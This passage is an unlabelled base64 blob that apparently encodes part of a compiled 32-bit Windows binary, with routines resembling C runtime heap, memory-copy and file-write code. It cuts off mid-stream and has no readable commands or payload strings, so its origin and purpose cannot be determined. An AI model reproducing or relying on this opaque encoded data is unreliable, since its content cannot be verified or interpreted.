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D/dQyNBMUBAAAAUP91GP/Wi/g7+w+EqwAAAH48gf/w//9/dzSNRD8IPQAEAAB3E+ihIwAAi8Q7w3QcxwDMzAAA6xFQ6Cf2//9ZO8N0CccA3d0AAIPACIvYhdt0aY0EP1BqAFPo3Z///4PEDFdT/3UQ/3UMagH/dRj/1oXAdBH/dRRQU/91CP8VLAEBEIlF+FPoyfr//4tF+FnrdTP2OV0cdQiLB4tAFIlFHDldGHUIiweLQASJRRj/dRzoDCEAAFmD+P91BDPA60c7RRh0HlNTjU0QUf91DFD/dRjoNCEAAIvwg8QYO/N03Il1DP91FP91EP91DP91CP91HP8VKAEBEIv4O/N0B1boqJ7//1mLx41l7F9eW4tN/DPN6CmW///Jw4v/VYvsg+wQ/3UIjU3w6DSY////dSSNTfD/dSD/dRz/dRj/dRT/dRD/dQzoFv7//4PEHIB9/AB0B4tN+INhcP3Jw4v/VYvsVot1CIX2D4SBAQAA/3YE6Die////dgjoMJ7///92DOgonv///3YQ6CCe////dhToGJ7///92GOgQnv///zboCZ7///92IOgBnv///3Yk6Pmd////dijo8Z3///92LOjpnf///3Yw6OGd////djTo2Z3///92HOjRnf///3Y46Mmd////djzowZ3//4PEQP92QOi2nf///3ZE6K6d////dkjopp3///92TOienf///3ZQ6Jad////dlTojp3///92WOiGnf///3Zc6H6d////dmDodp3///92ZOhunf///3Zo6Gad////dmzoXp3///92cOhWnf///3Z06E6d////dnjoRp3///92fOg+nf//g8RA/7aAAAAA6DCd////toQAAADoJZ3///+2iAAAAOganf///7aMAAAA6A+d////tpAAAADoBJ3///+2lAAAAOj5nP///7aYAAAA6O6c////tpwAAADo45z///+2oAAAAOjYnP///7akAAAA6M2c////tqgAAADowpz//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFYFoBEHQHUOifnP//WYtGBDsFZFoBEHQHUOiNnP//WYt2CDs1aFoBEHQHVuh7nP//WV5dw4v/VYvsVot1CIX2dH6LRgw7BWxaARB0B1DoWZz//1mLRhA7BXBaARB0B1DoR5z//1mLRhQ7BXRaARB0B1DoNZz//1mLRh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VoAwAAg4U45f//AoO9IOX//wB0KWoNWFCJhUDl///oFhsAAFlmO4VA5f//D4U7AwAA/4U45f///4Uw5f//i0UQOYVE5f//D4L5/f//6ScDAACLDooT/4U45f//iFQPNIsOiUQPOOkOAwAAM8mLBgPH9kAEgA+EvwIAAIuFNOX//4mNQOX//4TbD4XKAAAAiYU85f//OU0QD4YgAwAA6waLtSjl//+LjTzl//+DpUTl//8AK4005f//jYVI5f//O00QczmLlTzl////hTzl//+KEkGA+gp1EP+FMOX//8YADUD/hUTl//+IEED/hUTl//+BvUTl////EwAAcsKL2I2FSOX//yvYagCNhSzl//9QU42FSOX//1CLBv80B/8VOAEBEIXAD4RCAgAAi4Us5f//AYU45f//O8MPjDoCAACLhTzl//8rhTTl//87RRAPgkz////pIAIAAImFROX//4D7Ag+F0QAAADlNEA+GTQIAAOsGi7Uo5f//i41E5f//g6U85f//ACuNNOX//42FSOX//ztNEHNGi5VE5f//g4VE5f//Ag+3EkFBZoP6CnUWg4Uw5f//AmoNW2aJGEBAg4U85f//AoOFPOX//wJmiRBAQIG9POX///4TAABytYvYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xU4AQEQhcAPhGIBAACLhSzl//8BhTjl//87ww+MWgEAAIuFROX//yuFNOX//ztFEA+CP////+lAAQAAOU0QD4Z8AQAAi41E5f//g6U85f//ACuNNOX//2oCjYVI+f//XjtNEHM8i5VE5f//D7cSAbVE5f//A85mg/oKdQ5qDVtmiRgDxgG1POX//wG1POX//2aJEAPGgb085f//qAYAAHK/M/ZWVmhVDQAAjY3w6///UY2NSPn//yvBmSvC0fhQi8FQVmjp/QAA/xXcAAEQi9g73g+ElwAAAGoAjYUs5f//UIvDK8ZQjYQ18Ov//1CLhSjl//+LAP80B/8VOAEBEIXAdAwDtSzl//873n/L6wz/FRwAARCJhUDl//873n9ci4VE5f//K4U05f//iYU45f//O0UQD4IK////6z9qAI2NLOX//1H/dRD/tTTl////MP8VOAEBEIXAdBWLhSzl//+DpUDl//8AiYU45f//6wz/FRwAARCJhUDl//+DvTjl//8AdWyDvUDl//8AdC1qBV45tUDl//91FOijl///xwAJAAAA6KuX//+JMOs//7VA5f//6K+X//9Z6zGLtSjl//+LBvZEBwRAdA+LhTTl//+AOBp1BDPA6yToY5f//8cAHAAAAOhrl///gyAAg8j/6wyLhTjl//8rhTDl//9fW4tN/DPNXui3iP//ycNqEGhoMQEQ6HXU//+LRQiD+P51G+gvl///gyAA6BSX///HAAkAAACDyP/pnQAAADP/O8d8CDsFCHsBEHIh6AaX//+JOOjslv//xwAJAAAAV1dXV1fodJb//4PEFOvJi8jB+QWNHI0gewEQi/CD5h/B5gaLCw++TDEEg+EBdL9Q6OYVAABZiX38iwP2RDAEAXQW/3UQ/3UM/3UI6C74//+DxAyJReTrFuiJlv//xwAJAAAA6JGW//+JOINN5P/HRfz+////6AkAAACLReTo9dP//8P/dQjoMBYAAFnDi/9Vi+z/BVBmARBoABAAAOggxv//WYtNCIlBCIXAdA2DSQwIx0EYABAAAOsRg0kMBI1BFIlBCMdBGAIAAACLQQiDYQQAiQFdw4v